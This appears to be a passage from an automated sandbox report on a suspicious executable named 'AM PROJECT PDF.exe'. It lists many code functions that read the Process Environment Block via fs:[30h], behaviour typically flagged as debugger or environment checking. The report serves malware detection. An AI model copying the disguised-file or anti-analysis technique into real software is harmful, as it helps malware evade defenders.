Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h] 6_2_011899BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E69A6 mov eax, dword ptr fs:[00000030h] 6_2_011E69A6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011961A0 mov eax, dword ptr fs:[00000030h] 6_2_011961A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011961A0 mov eax, dword ptr fs:[00000030h] 6_2_011961A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011F41E8 mov eax, dword ptr fs:[00000030h] 6_2_011F41E8
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0116B1E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0116B1E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0116B1E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h] 6_2_011E7016
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h] 6_2_011E7016
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h] 6_2_011E7016
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h] 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h] 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h] 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h] 6_2_0118A830
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h] 6_2_0119002D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h] 6_2_0119002D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h] 6_2_0119002D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h] 6_2_0119002D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h] 6_2_0119002D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01234015 mov eax, dword ptr fs:[00000030h] 6_2_01234015
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01234015 mov eax, dword ptr fs:[00000030h] 6_2_01234015
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h] 6_2_0117B02A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h] 6_2_0117B02A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h] 6_2_0117B02A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h] 6_2_0117B02A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01180050 mov eax, dword ptr fs:[00000030h] 6_2_01180050
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01180050 mov eax, dword ptr fs:[00000030h] 6_2_01180050
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01222073 mov eax, dword ptr fs:[00000030h] 6_2_01222073
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01231074 mov eax, dword ptr fs:[00000030h] 6_2_01231074
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169080 mov eax, dword ptr fs:[00000030h] 6_2_01169080
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E3884 mov eax, dword ptr fs:[00000030h] 6_2_011E3884
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E3884 mov eax, dword ptr fs:[00000030h] 6_2_011E3884
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0119F0BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119F0BF mov eax, dword ptr fs:[00000030h] 6_2_0119F0BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119F0BF mov eax, dword ptr fs:[00000030h] 6_2_0119F0BF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A90AF mov eax, dword ptr fs:[00000030h] 6_2_011A90AF
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h] 6_2_011920A0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov ecx, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h] 6_2_011FB8D0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h] 6_2_011640E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h] 6_2_011640E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h] 6_2_011640E1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011658EC mov eax, dword ptr fs:[00000030h] 6_2_011658EC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122131B mov eax, dword ptr fs:[00000030h] 6_2_0122131B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116F358 mov eax, dword ptr fs:[00000030h] 6_2_0116F358
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116DB40 mov eax, dword ptr fs:[00000030h] 6_2_0116DB40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01193B7A mov eax, dword ptr fs:[00000030h] 6_2_01193B7A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01193B7A mov eax, dword ptr fs:[00000030h] 6_2_01193B7A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0116DB60
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238B58 mov eax, dword ptr fs:[00000030h] 6_2_01238B58
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01235BA5 mov eax, dword ptr fs:[00000030h] 6_2_01235BA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119B390 mov eax, dword ptr fs:[00000030h] 6_2_0119B390
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192397 mov eax, dword ptr fs:[00000030h] 6_2_01192397
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01171B8F mov eax, dword ptr fs:[00000030h] 6_2_01171B8F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01171B8F mov eax, dword ptr fs:[00000030h] 6_2_01171B8F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121D380 mov ecx, dword ptr fs:[00000030h] 6_2_0121D380
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122138A mov eax, dword ptr fs:[00000030h] 6_2_0122138A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h] 6_2_01194BAD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h] 6_2_01194BAD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h] 6_2_01194BAD
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E53CA mov eax, dword ptr fs:[00000030h] 6_2_011E53CA
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E53CA mov eax, dword ptr fs:[00000030h] 6_2_011E53CA
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0118DBE9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h] 6_2_011903E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116AA16 mov eax, dword ptr fs:[00000030h] 6_2_0116AA16
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116AA16 mov eax, dword ptr fs:[00000030h] 6_2_0116AA16
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01183A1C mov eax, dword ptr fs:[00000030h] 6_2_01183A1C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h] 6_2_01165210
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01165210 mov ecx, dword ptr fs:[00000030h] 6_2_01165210
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h] 6_2_01165210
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h] 6_2_01165210
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01178A0A mov eax, dword ptr fs:[00000030h] 6_2_01178A0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h] 6_2_0118A229
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AA16 mov eax, dword ptr fs:[00000030h] 6_2_0122AA16
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AA16 mov eax, dword ptr fs:[00000030h] 6_2_0122AA16
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A4A2C mov eax, dword ptr fs:[00000030h] 6_2_011A4A2C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A4A2C mov eax, dword ptr fs:[00000030h] 6_2_011A4A2C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238A62 mov eax, dword ptr fs:[00000030h] 6_2_01238A62
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121B260 mov eax, dword ptr fs:[00000030h] 6_2_0121B260
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121B260 mov eax, dword ptr fs:[00000030h] 6_2_0121B260
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011F4257 mov eax, dword ptr fs:[00000030h] 6_2_011F4257
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h] 6_2_01169240
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h] 6_2_01169240
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h] 6_2_01169240
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h] 6_2_01169240
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A927A mov eax, dword ptr fs:[00000030h] 6_2_011A927A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122EA55 mov eax, dword ptr fs:[00000030h] 6_2_0122EA55
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119D294 mov eax, dword ptr fs:[00000030h] 6_2_0119D294
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119D294 mov eax, dword ptr fs:[00000030h] 6_2_0119D294
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0117AAB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0117AAB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119FAB0 mov eax, dword ptr fs:[00000030h] 6_2_0119FAB0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h] 6_2_011652A5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h] 6_2_011652A5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h] 6_2_011652A5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h] 6_2_011652A5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h] 6_2_011652A5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192ACB mov eax, dword ptr fs:[00000030h] 6_2_01192ACB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192AE4 mov eax, dword ptr fs:[00000030h] 6_2_01192AE4
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238D34 mov eax, dword ptr fs:[00000030h] 6_2_01238D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122E539 mov eax, dword ptr fs:[00000030h] 6_2_0122E539
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h] 6_2_01194D3B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h] 6_2_01194D3B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h] 6_2_01194D3B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h] 6_2_01173D34
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116AD30 mov eax, dword ptr fs:[00000030h] 6_2_0116AD30
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011EA537 mov eax, dword ptr fs:[00000030h] 6_2_011EA537
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01187D50 mov eax, dword ptr fs:[00000030h] 6_2_01187D50
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A3D43 mov eax, dword ptr fs:[00000030h] 6_2_011A3D43
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E3540 mov eax, dword ptr fs:[00000030h] 6_2_011E3540
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01213D40 mov eax, dword ptr fs:[00000030h] 6_2_01213D40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118C577 mov eax, dword ptr fs:[00000030h] 6_2_0118C577
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118C577 mov eax, dword ptr fs:[00000030h] 6_2_0118C577
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119FD9B mov eax, dword ptr fs:[00000030h] 6_2_0119FD9B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119FD9B mov eax, dword ptr fs:[00000030h] 6_2_0119FD9B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012305AC mov eax, dword ptr fs:[00000030h] 6_2_012305AC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012305AC mov eax, dword ptr fs:[00000030h] 6_2_012305AC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h] 6_2_01191DB5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h] 6_2_01191DB5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h] 6_2_01191DB5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011935A1 mov eax, dword ptr fs:[00000030h] 6_2_011935A1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01218DF1 mov eax, dword ptr fs:[00000030h] 6_2_01218DF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov ecx, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
